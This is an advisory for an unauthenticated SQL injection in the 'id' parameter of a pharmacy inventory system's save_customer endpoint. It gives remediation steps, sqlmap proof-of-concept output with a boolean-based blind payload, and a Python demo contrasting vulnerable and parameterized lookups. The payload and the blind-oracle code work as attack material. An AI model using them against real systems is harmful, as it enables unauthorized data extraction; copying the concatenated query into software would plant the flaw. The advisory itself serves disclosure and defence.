# Vulnerability Summary: sourcecodedoster Pharmacy Sales and Inventory System SQL Injection

## Vulnerability Overview

* **Product Name**: Pharmacy Sales and Inventory System Project V1.0
* **Vulnerability Type**: SQL Injection
* **Affected File**: `/ajax.php?action=save_customer`
* **Vulnerable Parameter**: `id` (a multipart form field in the POST body)
* **Root Cause**: The value of the `id` parameter is placed into a SQL statement without sanitization, validation, or parameter binding, so attacker-supplied input is interpreted as SQL rather than as data. An attacker can therefore alter the query's logic and make the database perform operations the application never intended.
* **Exploitation Condition**: No login or authorization is required.

## Impact Scope

* **Affected Version**: V1.0
* **Potential Hazards**:
  * Unauthorized database access
  * Sensitive data leakage
  * Data tampering
  * Full system control
  * Service disruption
  * Serious threat to system security and business continuity

## Remediation Measures

1. **Use Prepared Statements and Parameter Binding**: Prepared statements separate the SQL text from user-supplied values. A bound value is passed to the database as pure data and is never parsed as SQL, so it cannot change the structure of the query.
2. **Input Validation and Filtering**: Strictly validate user input against the expected format before it reaches the database layer; for `id`, that means rejecting anything that is not an integer.
3. **Minimize Database User Privileges**: Ensure the account the application uses to connect to the database has only the privileges it needs. Do not use high-privilege accounts (such as `root` or `admin`) for routine application queries, so that even a successful injection cannot be turned into file access, user creation, or full server control.
4. **Regular Security Audits**: Audit the code and the deployed system regularly so that vulnerabilities of this kind are found and fixed promptly.

## POC Code

```text
...
Parameter: MULTIPART id ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: -----------------3738858121816587200387936454
Content-Disposition: form-data; name="id"

(SELECT (CASE WHEN (7479=7479) THEN '' ELSE (SELECT 5203 UNION SELECT 7749) END))
-----------------3738858121816587200387936454
Content-Disposition: form-data; name="name"

1111
-----------------3738858121816587200387936454--
...
```

The payload above replaces the entire `id` value with a subquery. While the condition (`7479=7479`) holds, the expression evaluates to an empty string and the request is processed normally; when the condition is false, the `ELSE` branch is a scalar subquery that returns two rows, which MySQL rejects with a "Subquery returns more than 1 row" error and the request fails. sqlmap confirms the injection by comparing the two responses, and any condition can then be substituted for `7479=7479` to extract data one true/false answer at a time. To reproduce, send the same multipart request twice, once with a true and once with a false condition in `id`, and compare the responses; a consistent difference is the boolean-based blind signal.
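The following is an added example, not code from the project or from this advisory, showing the remediation side by side with the flaw: a lookup that concatenates `id` into the SQL text, the same lookup with a bound parameter, and an integer check on `id`. The `customers` table and its rows are constructed sample data, and SQLite stands in for the application's database; because SQLite silently takes the first row of a multi-row scalar subquery instead of raising MySQL's "Subquery returns more than 1 row" error, the parameter-replace payload is adapted to return an existing id when the condition is true and 0 when it is false, which produces the same row/no-row oracle.

```python
import sqlite3


def make_db():
    """Constructed sample data (an assumption, not the project's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO customers (id, name) VALUES (?, ?)",
        [(1, "alice"), (2, "bob")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, customer_id):
    """Concatenates the raw id into the SQL text, the pattern the advisory describes."""
    sql = "SELECT name FROM customers WHERE id = " + str(customer_id)
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, customer_id):
    """Remediation 1: id is bound through a placeholder and is never parsed as SQL."""
    rows = conn.execute("SELECT name FROM customers WHERE id = ?", (customer_id,))
    return [row[0] for row in rows]


def validated_id(raw):
    """Remediation 2: accept only a decimal integer string for id."""
    if isinstance(raw, str) and raw.isdigit():
        return int(raw)
    raise ValueError("id must be a decimal integer")


def blind_payload(condition):
    """Parameter-replace payload modelled on the sqlmap output in the advisory.

    Adapted for SQLite: evaluates to the existing id 1 when the condition holds
    (a row comes back) and to 0 when it does not (no row comes back).
    """
    return f"(SELECT CASE WHEN ({condition}) THEN 1 ELSE 0 END)"


def oracle(conn, condition):
    """What a blind attacker sees through the vulnerable path: one yes/no answer."""
    return bool(lookup_vulnerable(conn, blind_payload(condition)))


if __name__ == "__main__":
    db = make_db()
    print(oracle(db, "7479=7479"))  # True
    print(oracle(db, "7479=7480"))  # False
    # The same oracle answers questions about other rows, one bit at a time.
    print(oracle(db, "(SELECT length(name) FROM customers WHERE id = 2) = 3"))  # True
    # Bound as a value, the payload matches no row and no subquery runs.
    print(lookup_parameterized(db, blind_payload("7479=7479")))  # []
    print(lookup_parameterized(db, validated_id("1")))  # ['alice']
```

The `oracle` function is the whole of a boolean-based blind attack in miniature: the attacker never sees query results, only whether the application behaved as it does for a valid `id`. With the placeholder version the payload string is compared to the integer column as data and matches nothing, and `validated_id` stops it even earlier, before any query is built.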